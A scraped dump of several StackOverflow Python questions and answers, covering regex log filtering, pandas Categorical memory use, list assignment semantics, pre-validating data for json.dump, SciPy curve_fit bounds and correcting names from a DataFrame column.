[ "import os, re\npath = \"Log\\\\\"\nfile_list = [path + f for f in os.listdir(path) if f.endswith('.log')]\n\nAll keep_phrases in a container, I choose a dictionary but since they are identified by order, it could have been a list:\nkeep_phrases = {'keep_phrases1': [\"123456\", \"Login\"], 'keep_phrases2':[\"123457\", \"Login\"]}\n\n# Alternative, a list would work:\n# keep_phrases = [[\"123456\", \"Login\"], [\"123457\", \"Login\"]]\n\nNow let's generate a list with the compiled patterns:\ndef compile_pattern(keep_phrase):\n pat = r\"\\b.*?\\b\".join([re.escape(word) for word in keep_phrase])\n pat = re.compile(r\"\\b\" + pat + r\"\\b\")\n return pat\n\npatterns = [compile_pattern(keep_phrases[keep_phrase]) for keep_phrase in keep_phrases.keys()]\n\n# if keep_phrases had been a list, we would do\n# patterns = [compile_pattern(keep_phrase) for keep_phrase in keep_phrases]\n\nFinally, we look for matches for every pattern and if we get any finding, we write to file.\nif len(file_list) != 0:\n for infile in sorted(file_list):\n with open(infile, encoding=\"latin-1\") as f:\n f = f.readlines()\n for line in f:\n findings = [pat.search(line) for pat in patterns] # can do this because there's a list with patterns\n if any(findings):\n with open(outfile, \"a\") as wf:\n wf.write(line)\n\n", "Try, this. I read the whole file in a string to make code fast and readable, findall will return a list with all matching lines for the file.\nIf memory is a problem the pattern also works on individual lines:\nimport re\n\nfile_list=[\"sit.txt\"]\n\nkeep_phrases=[[\"123456\", \"Login\"],[\"123457\", \"Login\"]]\n\npat = [r\"(?:.*?(?:\" + p1 + r\"\\b.*?\"+p2+r\".*?(?:\\n|$)))\" for p1,p2 in keep_phrases]\npat= r\"|\".join(pat)\n\nfor infile in sorted(file_list):\n with open(infile, encoding=\"latin-1\") as f:\n text=f.read()\n print(re.findall(pat,text))\n\n\n", "Without regex\ndef match_words(line, words):\n return all(word in words for word in line)\n\nwith open(infile, encoding=\"latin-1\") as f:\n f = f.readlines()\n for line in f:\n split_line = line.split(\",\")\n if any( match_words(split_line , word) for word in [keep_phrases1, keep_phrases2]):\n with open(outfile, \"a\") as wf:\n wf.write(line)\n\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "python", "python_re", "txt" ]
stackoverflow_0074568196_python_python_re_txt.txt
Q: When should I use pandas' Categorical dtype? My question concerns optimizing memory usage for pandas Series. The docs note, The memory usage of a Categorical is proportional to the number of categories plus the length of the data. In contrast, an object dtype is a constant times the length of the data. My understanding is that pandas Categorical data is effectively a mapping to unique (downcast) integers that represent categories, where the integers themselves occupy (presumably) fewer bytes than the strings that make up the object dtype. My question: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? How direct is the aforementioned proportionality, and doesn't it also depend on the length of each element (string) in the Series? In the test below, pd.Categorical seems to win by a long shot. import string import matplotlib.pyplot as plt import numpy as np import pandas as pd np.random.seed(444) %matplotlib inline def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 catgrs = tuple(string.printable) lengths = np.arange(1, 10001, dtype=np.uint16) sizes = [] for length in lengths: obj = pd.Series(np.random.choice(catgrs, size=length)) cat = obj.astype('category') sizes.append((mem_usage(obj), mem_usage(cat))) sizes = np.array(sizes) fig, ax = plt.subplots() ax.plot(sizes) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') Albeit, for n<125, pd.Categorical is slightly larger. fig, ax = plt.subplots() ax.plot(sizes[:200]) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') A: categorical astype uses less memory. However one hot encoding allows you to maintain categorical ranking of the level. you can analyze the classifier coefficients to understand behavior and predictions on the categorical data. A: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? I would say : "no" And to be extreme: "opinion based" In both cases, a strict use case context should be given. What happens if your categorical data is built from complex objects, or long strings, or very big numbers (hashes) ? or from a pd.cut complex function ? What is total nb of rows of your data ? 1_000 ? 100_000 ? 10_000_000_000 ? What is the ratio category/nb_of_data ? is it stable from one data set to the other ? The following code tries to observe where the 2 curves intersect with different categorical data string length values and different ratios nb_categories / nb of data. 
import hashlib import itertools import math import sys from pathlib import Path import matplotlib.pyplot as plt import numpy as np import pandas as pd import seaborn as sns from tqdm import tqdm np.random.seed(444) def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 def do_test(max_dataset_length): lengths = np.arange(1, max_dataset_length, dtype=np.uint16) obj_vals = [] cat_vals = [] for length in tqdm(lengths, desc="generate samples"): obj = pd.Series(np.random.choice(categories, size=length)) cat = obj.astype('category') obj_vals.append(mem_usage(obj)) cat_vals.append(mem_usage(cat)) objs_arr = np.array(obj_vals) cats_arr = np.array(cat_vals) arr = objs_arr - cats_arr first_zero_index = (arr > 0).argmax(axis=0) # index of intersection between the 2 data sets return first_zero_index results_path = Path.cwd() / "results.csv" if results_path.exists(): results_df = pd.read_csv(results_path, index_col=0) results_df.to_csv(results_path) else: i = 1 l_cat_nbs = [10, 100, 500] # , 1_000, 2_000, 5_000] # l_hash_func = [hashlib.sha1, hashlib.sha3_512] l_cat_data_ratios = [0.1, 0.2, 0.5, 0.7, 0.9] l_hash_sizes = [4, 16, 32, 64, 128] measure_cat_str_len = [] measure_cat_size = [] measure_nb_samples = [] measure_ratios = [] measure_threshold = [] measure_nb_cats = [] hash_function = hashlib.sha3_512 all_hashes = [hash_function(bytes(e)).hexdigest() for e in tqdm(np.random.random_sample(max(l_cat_nbs)), desc="generate hashes")] for nb_cat, hash_size in itertools.product( # hash_function l_cat_nbs, l_hash_sizes # l_hash_func ): categories = [e[:hash_size] for e in all_hashes] example_hash = categories[0] original_cat_size = sys.getsizeof(example_hash) original_cat_str_len = len(example_hash) print(f"{hash_function.__name__} => {example_hash} - len={original_cat_str_len} - size={original_cat_size}") cat_df = pd.DataFrame({"hash": categories}) cat_df["cat"] = cat_df["hash"].astype('category') print(f"Category mem size={sys.getsizeof(cat_df['cat'].dtype)}") for ratio in l_cat_data_ratios: max_length = int(math.floor(nb_cat / ratio)) if threshold := do_test(max_dataset_length=max_length): measure_nb_cats.append(nb_cat) measure_cat_str_len.append(original_cat_str_len) measure_cat_size.append(original_cat_size) measure_nb_samples.append(max_length) measure_ratios.append(ratio) measure_threshold.append(threshold) results_df = pd.DataFrame( {"original cat str len" : measure_cat_str_len, "original cat data size" : measure_cat_size, "nb samples" : measure_nb_samples, "nb cat / nb samples ratio": measure_ratios, "nb samples threshold" : measure_threshold, "nb cat" : measure_nb_cats } ) results_df.to_csv(results_path) results_df["nb cat / nb samples ratio"] = results_df["nb cat / nb samples ratio"].astype('category') g = sns.FacetGrid( results_df, col="nb cat / nb samples ratio", ) g.map(sns.lineplot, "original cat data size", "nb samples threshold") g.map(sns.scatterplot, "original cat data size", "nb samples threshold") plt.show() original cat data size : memory size of the original categorical data (hash hex string of various sizes) Which gives: Categorical is just a way of expressing a kind of enum with some additional data and properties (see the link you gave : https://pandas.pydata.org/docs/user_guide/categorical.html => semantics, ordering, 
...). When nb_cat ~= nb_elements, which seems to be the worst case scenario according to pandas' doc, then one can start to wonder : what's the category useful for when there is 1 category per data value ? colA colA_catagorical 1 1 2 2 3 3 ... ... n n # eeeeew ! The rest is "in between", hence my "no"/"opinion based" answer. Only a specific benchmark on your own use case may give some useful insight, and some sense of scalability of the possible implementation choices. The pandas' doc speaks specifically of the string => categorical transformation, because it is probably the most common case where some raw string input (CSV, JSON, from external API, tool, lab measurment machine, ...) is transformed into a DataFrame, and some columns are indeed categorical. The other cases maybe pd.cut, pd.qcut and similar, but how likely is the result predictable for optimization purposes ?
When should I use pandas' Categorical dtype?
My question concerns optimizing memory usage for pandas Series. The docs note, The memory usage of a Categorical is proportional to the number of categories plus the length of the data. In contrast, an object dtype is a constant times the length of the data. My understanding is that pandas Categorical data is effectively a mapping to unique (downcast) integers that represent categories, where the integers themselves occupy (presumably) fewer bytes than the strings that make up the object dtype. My question: is there any rule-of-thumb for when using pd.Categorical will not save memory over object? How direct is the aforementioned proportionality, and doesn't it also depend on the length of each element (string) in the Series? In the test below, pd.Categorical seems to win by a long shot. import string import matplotlib.pyplot as plt import numpy as np import pandas as pd np.random.seed(444) %matplotlib inline def mem_usage(obj, index=False, total=True, deep=True): """Memory usage of pandas Series or DataFrame.""" # Ported from https://www.dataquest.io/blog/pandas-big-data/ usg = obj.memory_usage(index=index, deep=deep) if isinstance(obj, pd.DataFrame) and total: usg = usg.sum() # Bytes to megabytes return usg / 1024 ** 2 catgrs = tuple(string.printable) lengths = np.arange(1, 10001, dtype=np.uint16) sizes = [] for length in lengths: obj = pd.Series(np.random.choice(catgrs, size=length)) cat = obj.astype('category') sizes.append((mem_usage(obj), mem_usage(cat))) sizes = np.array(sizes) fig, ax = plt.subplots() ax.plot(sizes) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype') Albeit, for n<125, pd.Categorical is slightly larger. fig, ax = plt.subplots() ax.plot(sizes[:200]) ax.set_ylabel('Size (MB)') ax.set_xlabel('Series length') ax.legend(['object dtype', 'category dtype']) ax.set_title('Memory usage of object vs. category dtype')
[ "categorical astype uses less memory. However one hot encoding allows you to maintain categorical ranking of the level. you can analyze the classifier coefficients to understand behavior and predictions on the categorical data.\n", "\nis there any rule-of-thumb for when using pd.Categorical will not save memory over object?\n\nI would say : \"no\"\nAnd to be extreme: \"opinion based\"\nIn both cases, a strict use case context should be given.\n\nWhat happens if your categorical data is built from complex objects, or long strings, or very big numbers (hashes) ?\nor from a pd.cut complex function ?\nWhat is total nb of rows of your data ? 1_000 ? 100_000 ? 10_000_000_000 ?\nWhat is the ratio category/nb_of_data ? is it stable from one data set to the other ?\n\nThe following code tries to observe where the 2 curves intersect with different categorical data string length values and different ratios nb_categories / nb of data.\nimport hashlib\nimport itertools\nimport math\nimport sys\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom tqdm import tqdm\n\nnp.random.seed(444)\n\n\ndef mem_usage(obj, index=False, total=True, deep=True):\n \"\"\"Memory usage of pandas Series or DataFrame.\"\"\"\n # Ported from https://www.dataquest.io/blog/pandas-big-data/\n usg = obj.memory_usage(index=index, deep=deep)\n if isinstance(obj, pd.DataFrame) and total:\n usg = usg.sum()\n # Bytes to megabytes\n return usg / 1024 ** 2\n\n\ndef do_test(max_dataset_length):\n lengths = np.arange(1, max_dataset_length, dtype=np.uint16)\n obj_vals = []\n cat_vals = []\n for length in tqdm(lengths, desc=\"generate samples\"):\n obj = pd.Series(np.random.choice(categories, size=length))\n cat = obj.astype('category')\n obj_vals.append(mem_usage(obj))\n cat_vals.append(mem_usage(cat))\n objs_arr = np.array(obj_vals)\n cats_arr = np.array(cat_vals)\n arr = objs_arr - cats_arr\n first_zero_index = (arr > 0).argmax(axis=0) # index of intersection between the 2 data sets\n return first_zero_index\n\n\nresults_path = Path.cwd() / \"results.csv\"\n\nif results_path.exists():\n results_df = pd.read_csv(results_path, index_col=0)\n results_df.to_csv(results_path)\nelse:\n i = 1\n l_cat_nbs = [10, 100, 500] # , 1_000, 2_000, 5_000]\n # l_hash_func = [hashlib.sha1, hashlib.sha3_512]\n l_cat_data_ratios = [0.1, 0.2, 0.5, 0.7, 0.9]\n l_hash_sizes = [4, 16, 32, 64, 128]\n measure_cat_str_len = []\n measure_cat_size = []\n measure_nb_samples = []\n measure_ratios = []\n measure_threshold = []\n measure_nb_cats = []\n hash_function = hashlib.sha3_512\n all_hashes = [hash_function(bytes(e)).hexdigest() for e in\n tqdm(np.random.random_sample(max(l_cat_nbs)), desc=\"generate hashes\")]\n for nb_cat, hash_size in itertools.product( # hash_function\n l_cat_nbs,\n l_hash_sizes\n # l_hash_func\n ):\n\n categories = [e[:hash_size] for e in all_hashes]\n example_hash = categories[0]\n original_cat_size = sys.getsizeof(example_hash)\n original_cat_str_len = len(example_hash)\n print(f\"{hash_function.__name__} => {example_hash} - len={original_cat_str_len} - size={original_cat_size}\")\n cat_df = pd.DataFrame({\"hash\": categories})\n cat_df[\"cat\"] = cat_df[\"hash\"].astype('category')\n print(f\"Category mem size={sys.getsizeof(cat_df['cat'].dtype)}\")\n for ratio in l_cat_data_ratios:\n max_length = int(math.floor(nb_cat / ratio))\n if threshold := do_test(max_dataset_length=max_length):\n measure_nb_cats.append(nb_cat)\n 
measure_cat_str_len.append(original_cat_str_len)\n measure_cat_size.append(original_cat_size)\n measure_nb_samples.append(max_length)\n measure_ratios.append(ratio)\n measure_threshold.append(threshold)\n\n results_df = pd.DataFrame(\n {\"original cat str len\" : measure_cat_str_len,\n \"original cat data size\" : measure_cat_size,\n \"nb samples\" : measure_nb_samples,\n \"nb cat / nb samples ratio\": measure_ratios,\n \"nb samples threshold\" : measure_threshold,\n \"nb cat\" : measure_nb_cats\n }\n )\n results_df.to_csv(results_path)\n\nresults_df[\"nb cat / nb samples ratio\"] = results_df[\"nb cat / nb samples ratio\"].astype('category')\ng = sns.FacetGrid(\n results_df,\n col=\"nb cat / nb samples ratio\",\n)\ng.map(sns.lineplot, \"original cat data size\", \"nb samples threshold\")\ng.map(sns.scatterplot, \"original cat data size\", \"nb samples threshold\")\nplt.show()\n\n\n\noriginal cat data size : memory size of the original categorical data (hash hex string of various sizes)\n\nWhich gives:\n\n\nCategorical is just a way of expressing a kind of enum with some additional data and properties (see the link you gave : https://pandas.pydata.org/docs/user_guide/categorical.html => semantics, ordering, ...).\nWhen nb_cat ~= nb_elements, which seems to be the worst case scenario according to pandas' doc, then one can start to wonder :\n\nwhat's the category useful for when there is 1 category per data value ?\n\ncolA colA_catagorical\n1 1\n2 2\n3 3\n... ...\nn n\n# eeeeew !\n\nThe rest is \"in between\", hence my \"no\"/\"opinion based\" answer.\nOnly a specific benchmark on your own use case may give some useful insight, and some sense of scalability of the possible implementation choices.\nThe pandas' doc speaks specifically of the string => categorical transformation, because it is probably the most common case where some raw string input (CSV, JSON, from external API, tool, lab measurment machine, ...) is transformed into a DataFrame, and some columns are indeed categorical.\nThe other cases maybe pd.cut, pd.qcut and similar, but how likely is the result predictable for optimization purposes ?\n" ]
[ 0, 0 ]
[]
[]
[ "categorical_data", "memory", "pandas", "python" ]
stackoverflow_0048256395_categorical_data_memory_pandas_python.txt
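For the Categorical-memory question above, a quick rule-of-thumb check on your own column is to compare memory_usage(deep=True) for the two dtypes before converting. The Series below is made up purely for illustration:

import numpy as np
import pandas as pd

rng = np.random.default_rng(444)
s = pd.Series(rng.choice(["alpha", "beta", "gamma"], size=10_000))  # hypothetical column

obj_mb = s.astype(object).memory_usage(deep=True) / 1024 ** 2
cat_mb = s.astype("category").memory_usage(deep=True) / 1024 ** 2
print(f"object: {obj_mb:.3f} MB, category: {cat_mb:.3f} MB")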
Q: How do Assignment Operators and Lists Work? - Python The assignment operator appears to work differently for lists than it does for integers: >>> list1 = [1,2,3,4,5] >>> newlist1 = list1 >>> print(id(list1)) 140282759536448 >>> print(id(newlist1)) 140282759536448 >>> newlist1.append(6) >>> print(id(newlist1)) 140282759536448 >>> print(list1) [1, 2, 3, 4, 5, 6] >>> print(newlist1) [1, 2, 3, 4, 5, 6] The Assignment Operator works in a similar way with integers: >>> int1 = 1 >>> newint1 = int1 >>> print(id(int1)) 140282988331248 >>> print(id(newint1)) 140282988331248 But modifying one of the integers creates a new ID: >>> newint1 = newint1 + 1 >>> print(id(newint1)) 140282988331280 >>> print(id(int1)) 140282988331248 Why does modifying a list not create a new ID? As well, how would you create a new ID for a list? A: You should use newlist1 = list1.copy() because when you do newlist1 = list1 you are not creating new list you are referencing the same list A: In Python, when you assign a list to a new variable, you will only pass the address of the list to it. That is why the id()function return the same value. If you want to actually copy the list you have to use the copy() function: initList = ["a", "b", "c"] print(id(initList)) copiedList = initList.copy() print(id(copiedList))
How do Assignment Operators and Lists Work? - Python
The assignment operator appears to work differently for lists than it does for integers: >>> list1 = [1,2,3,4,5] >>> newlist1 = list1 >>> print(id(list1)) 140282759536448 >>> print(id(newlist1)) 140282759536448 >>> newlist1.append(6) >>> print(id(newlist1)) 140282759536448 >>> print(list1) [1, 2, 3, 4, 5, 6] >>> print(newlist1) [1, 2, 3, 4, 5, 6] The Assignment Operator works in a similar way with integers: >>> int1 = 1 >>> newint1 = int1 >>> print(id(int1)) 140282988331248 >>> print(id(newint1)) 140282988331248 But modifying one of the integers creates a new ID: >>> newint1 = newint1 + 1 >>> print(id(newint1)) 140282988331280 >>> print(id(int1)) 140282988331248 Why does modifying a list not create a new ID? As well, how would you create a new ID for a list?
[ "You should use newlist1 = list1.copy() because when you do newlist1 = list1 you are not creating new list you are referencing the same list\n", "In Python, when you assign a list to a new variable, you will only pass the address of the list to it.\nThat is why the id()function return the same value.\nIf you want to actually copy the list you have to use the copy() function:\ninitList = [\"a\", \"b\", \"c\"]\nprint(id(initList))\n\ncopiedList = initList.copy()\nprint(id(copiedList))\n\n" ]
[ 0, 0 ]
[]
[]
[ "assignment_operator", "integer", "list", "python", "python_3.x" ]
stackoverflow_0074575436_assignment_operator_integer_list_python_python_3.x.txt
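A related point for the list-assignment question above: list.copy() is only a shallow copy, so nested lists still share their inner lists. The values here are arbitrary:

import copy

outer = [[1, 2], [3, 4]]
shallow = outer.copy()
deep = copy.deepcopy(outer)

shallow[0].append(99)   # the inner list is shared, so `outer` sees this too
deep[1].append(42)      # the deep copy is fully independent

print(outer)    # [[1, 2, 99], [3, 4]]
print(shallow)  # [[1, 2, 99], [3, 4]]
print(deep)     # [[1, 2], [3, 4, 42]]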
Q: Displaying better error than TypeException when doing JSON.dump on Python When Python json.dump fails to serialise value, it does not tell what was the invalid key or where it was located. This makes json.dump useless when trying to locate data errors in large JSON objects. Is it possible to improve json.dump TypeError error messages? A: One can pre-validate the data before passing it to json.dump. json.dump encoder itself does not pass data locatin information around, making it hard to use it for the task. Here is a Python code that Raises nested custom exceptions to locate any keys with bad values Contains some useful checks and patterns for common Python libraries which might be pitfalls on naive use os json.dump() Call validate_nested_state_dict() before passing the data to json.dump. import datetime from decimal import Decimal from enum import Enum from types import NoneType from typing import Any import pandas as pd import numpy as np class BadStateData(Exception): """Having something we do not support in the state.""" #: Types we know we can safely pass to JSON serialisation ALLOWED_VALUE_TYPES = ( dict, list, float, int, str, NoneType, Enum, # Supported by dadtaclasses_json datetime.datetime, # Supported by dadtaclasses_json Decimal, # Supported by dadtaclasses_json ) #: We especially do not want to see these in serialisation. #: We need to do negative test, because Pandas types to some base class #: magic. BAD_VALUE_TYPES = ( np.float32, pd.Timedelta, pd.Timestamp, ) def validate_state_value(name: str | int, val: Any): if not isinstance(val, ALLOWED_VALUE_TYPES): raise BadStateData(f"Bad value {name}: {val} ({type(val)}") if isinstance(val, BAD_VALUE_TYPES): raise BadStateData(f"Bad value {name}: {val} ({type(val)}") def walk(name, val): """Raise hierarchical exceptions to locate the bad key-value pair in nested data.""" try: if isinstance(val, dict): for k, v in val.items(): walk(k, v) elif isinstance(val, list): for idx, val in enumerate(val): walk(idx, val) else: validate_state_value(name, val) except BadStateData as e: raise BadStateData(f"Key {name} contained bad value") from e def validate_nested_state_dict(d: dict | list | object): walk("state", d)
Displaying better error than TypeException when doing JSON.dump on Python
When Python json.dump fails to serialise value, it does not tell what was the invalid key or where it was located. This makes json.dump useless when trying to locate data errors in large JSON objects. Is it possible to improve json.dump TypeError error messages?
[ "One can pre-validate the data before passing it to json.dump. json.dump encoder itself does not pass data locatin information around, making it hard to use it for the task.\nHere is a Python code that\n\nRaises nested custom exceptions to locate any keys with bad values\n\nContains some useful checks and patterns for common Python libraries which might be pitfalls on naive use os json.dump()\n\n\nCall validate_nested_state_dict() before passing the data to json.dump.\nimport datetime\nfrom decimal import Decimal\nfrom enum import Enum\nfrom types import NoneType\nfrom typing import Any\n\nimport pandas as pd\nimport numpy as np\n\n\nclass BadStateData(Exception):\n \"\"\"Having something we do not support in the state.\"\"\"\n\n\n#: Types we know we can safely pass to JSON serialisation\nALLOWED_VALUE_TYPES = (\n dict,\n list,\n float,\n int,\n str,\n NoneType,\n Enum, # Supported by dadtaclasses_json\n datetime.datetime, # Supported by dadtaclasses_json\n Decimal, # Supported by dadtaclasses_json\n)\n\n#: We especially do not want to see these in serialisation.\n#: We need to do negative test, because Pandas types to some base class\n#: magic.\nBAD_VALUE_TYPES = (\n np.float32,\n pd.Timedelta,\n pd.Timestamp,\n)\n\ndef validate_state_value(name: str | int, val: Any):\n if not isinstance(val, ALLOWED_VALUE_TYPES):\n raise BadStateData(f\"Bad value {name}: {val} ({type(val)}\")\n\n if isinstance(val, BAD_VALUE_TYPES):\n raise BadStateData(f\"Bad value {name}: {val} ({type(val)}\")\n\n\ndef walk(name, val):\n \"\"\"Raise hierarchical exceptions to locate the bad key-value pair in nested data.\"\"\"\n try:\n if isinstance(val, dict):\n for k, v in val.items():\n walk(k, v)\n elif isinstance(val, list):\n for idx, val in enumerate(val):\n walk(idx, val)\n else:\n validate_state_value(name, val)\n except BadStateData as e:\n raise BadStateData(f\"Key {name} contained bad value\") from e\n\n\ndef validate_nested_state_dict(d: dict | list | object):\n walk(\"state\", d)\n\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074575566_python.txt
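For the JSON serialisation question above, if knowing the offending value (rather than its full key path) is enough, json.dumps accepts a default= hook that is called for every object it cannot serialise natively. The sample data is invented:

import json

def report_unserializable(obj):
    # json.dumps calls this for any object it cannot handle itself.
    raise TypeError(f"cannot serialise {obj!r} of type {type(obj).__name__}")

data = {"ok": 1, "bad": {1, 2, 3}}  # a set is not JSON-serialisable

try:
    json.dumps(data, default=report_unserializable)
except TypeError as exc:
    print(exc)  # cannot serialise {1, 2, 3} of type set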
Q: Python SciPy is 'RuntimeWarning: invalid value encountered in sqrt' bad? I wanted to fit some astronomical data (made up data mostly), using a gaussian function on a line. I took the residual of the gaussian+line function on x-axis so I only had to fit the gaussian. Here's how I defined it: def gaussian_only(x, amp, mean, std): curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) * np.sqrt(std)/np.sqrt(std) * np.sqrt(amp)/np.sqrt(amp) * np.sqrt(mean)/np.sqrt(mean) return curve I multiplied and divided by sqrt of the values as the curvefit (defined in another function) was returning me negative values for standard deviation, mean and amplitude. So this kind of forced it to return me only positive values. Here's the function: def gaussian_only_fit(arr, curve_residual, initial_guess): amp, mean, std = initial_guess fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std]) return fit Is there something "wrong" or "bad" with what I did? EDIT: I did try "bounds" argument for curve_fit. It gives me worse fit values than before. A: curve_fit() probably attempted to evaluate your function with a negative value of std. You can use the bounds argument of curve_fit() to avoid this. You should probably also avoid fitting with 0 standard deviation, so set a very small positive value as the lower bound: fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std], bounds=([0, -inf, 1e-15],[inf, inf, inf])) Given your application, I've also set the minimum value for amp to 0 here. Depending on what the data represents you might also want to set limits on mean. Note the bounds argument was only introduced in scipy version 0.17. If you are using an older version of scipy, you could use a variable transformation like def gaussian_only(x, log_amp, log_mean, log_std): amp = np.exp(log_amp) # Guarantees 0 < amp < infinity mean = np.exp(log_mean) std = np.exp(log_std) curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) return curve Of course you will have to adjust your starting guess to account for the transformation.
Python SciPy is 'RuntimeWarning: invalid value encountered in sqrt' bad?
I wanted to fit some astronomical data (made up data mostly), using a gaussian function on a line. I took the residual of the gaussian+line function on x-axis so I only had to fit the gaussian. Here's how I defined it: def gaussian_only(x, amp, mean, std): curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) ) * np.sqrt(std)/np.sqrt(std) * np.sqrt(amp)/np.sqrt(amp) * np.sqrt(mean)/np.sqrt(mean) return curve I multiplied and divided by sqrt of the values as the curvefit (defined in another function) was returning me negative values for standard deviation, mean and amplitude. So this kind of forced it to return me only positive values. Here's the function: def gaussian_only_fit(arr, curve_residual, initial_guess): amp, mean, std = initial_guess fit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std]) return fit Is there something "wrong" or "bad" with what I did? EDIT: I did try "bounds" argument for curve_fit. It gives me worse fit values than before.
[ "curve_fit() probably attempted to evaluate your function with a negative value of std.\nYou can use the bounds argument of curve_fit() to avoid this. You should probably also avoid fitting with 0 standard deviation, so set a very small positive value as the lower bound:\nfit = scipy.optimize.curve_fit(gaussian_only, arr[0], curve_residual, [amp,mean,std], bounds=([0, -inf, 1e-15],[inf, inf, inf]))\n\nGiven your application, I've also set the minimum value for amp to 0 here. Depending on what the data represents you might also want to set limits on mean.\nNote the bounds argument was only introduced in scipy version 0.17. If you are using an older version of scipy, you could use a variable transformation like\ndef gaussian_only(x, log_amp, log_mean, log_std):\n amp = np.exp(log_amp) # Guarantees 0 < amp < infinity\n mean = np.exp(log_mean)\n std = np.exp(log_std)\n curve = amp*np.exp(-(x-mean)**2 /( 2*std**2 ) )\n return curve\n\nOf course you will have to adjust your starting guess to account for the transformation.\n" ]
[ 1 ]
[]
[]
[ "curve_fitting", "python", "scipy" ]
stackoverflow_0074575480_curve_fitting_python_scipy.txt
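For the curve_fit question above, here is the bounds suggestion assembled into a runnable sketch; the data is synthetic and the starting guesses are arbitrary:

import numpy as np
from scipy.optimize import curve_fit

def gaussian_only(x, amp, mean, std):
    return amp * np.exp(-(x - mean) ** 2 / (2 * std ** 2))

x = np.linspace(-5, 5, 200)
y = gaussian_only(x, 2.0, 0.5, 1.2) + np.random.normal(0, 0.05, x.size)

popt, pcov = curve_fit(
    gaussian_only, x, y, p0=[1.0, 0.0, 1.0],
    bounds=([0.0, -np.inf, 1e-12], [np.inf, np.inf, np.inf]),
)
print(popt)  # fitted amp, mean, std; amp and std are kept non-negative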
Q: Need to find and replace/correct list from another df column I have a list let suppose F = [Jonii, Max, anna, xyz, etc..] and df which contains 2 column- Name and Corrected_Name. df I need to search each string from list into df[Name] and replace it with df[Corrected_Name]. For eg. in above, code will search list in df[Name] and if found which is "Jonii" then replace it with "Jon" which is from df[Corrected_Name]. So finally output will be f = [Jon, Max, anna, xyz, etc..] Thanks in advance!! I am learner so pls ignore writing mistakes. A: You can use a simple dict to do that: d = {k: v for k, v in zip(df['Name'], df['Corrected_Name'])} f = [d.get(k, k) for k in F] Reproducible example df = pd.DataFrame([['a', 'b'], ['b', 'c'], ['foo', 'bar']], columns=['Name', 'Corrected_Name']) F = ['a', 'aa', 'b', 'hello', 'foo'] # code above >>> f ['b', 'aa', 'c', 'hello', 'bar'] A: Maybe like this (Admittedly this is not the best way to do it): import pandas as pd df = pd.DataFrame({"Name": ["Johnii", "Tommi", "Marc"], "CorrectedName": ["John", "Tom", "Mark"]}) names = ["Johnii", "Elizabeth", "Arthur", "Tommi"] output = [] for name in names: updated_value = [cn for n, cn in zip(df['Name'], df['CorrectedName']) if n == name] output.append(updated_value[0] if updated_value else name) print(output)
Need to find and replace/correct list from another df column
I have a list let suppose F = [Jonii, Max, anna, xyz, etc..] and df which contains 2 column- Name and Corrected_Name. df I need to search each string from list into df[Name] and replace it with df[Corrected_Name]. For eg. in above, code will search list in df[Name] and if found which is "Jonii" then replace it with "Jon" which is from df[Corrected_Name]. So finally output will be f = [Jon, Max, anna, xyz, etc..] Thanks in advance!! I am learner so pls ignore writing mistakes.
[ "You can use a simple dict to do that:\nd = {k: v for k, v in zip(df['Name'], df['Corrected_Name'])}\nf = [d.get(k, k) for k in F]\n\nReproducible example\ndf = pd.DataFrame([['a', 'b'], ['b', 'c'], ['foo', 'bar']], columns=['Name', 'Corrected_Name'])\nF = ['a', 'aa', 'b', 'hello', 'foo']\n\n# code above\n\n>>> f\n['b', 'aa', 'c', 'hello', 'bar']\n\n", "Maybe like this (Admittedly this is not the best way to do it):\nimport pandas as pd\n\ndf = pd.DataFrame({\"Name\": [\"Johnii\", \"Tommi\", \"Marc\"], \"CorrectedName\": [\"John\", \"Tom\", \"Mark\"]})\nnames = [\"Johnii\", \"Elizabeth\", \"Arthur\", \"Tommi\"]\n\noutput = []\nfor name in names:\n updated_value = [cn for n, cn in zip(df['Name'], df['CorrectedName']) if n == name]\n output.append(updated_value[0] if updated_value else name)\n\nprint(output)\n\n" ]
[ 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575299_pandas_python.txt
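For the name-correction question above, the same dictionary idea can also be expressed with pandas map/fillna; the frame and names below are invented:

import pandas as pd

df = pd.DataFrame({"Name": ["Jonii", "Tommi"], "Corrected_Name": ["Jon", "Tom"]})
names = ["Jonii", "Max", "anna"]

mapping = dict(zip(df["Name"], df["Corrected_Name"]))
s = pd.Series(names)
corrected = s.map(mapping).fillna(s).tolist()
print(corrected)  # ['Jon', 'Max', 'anna']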
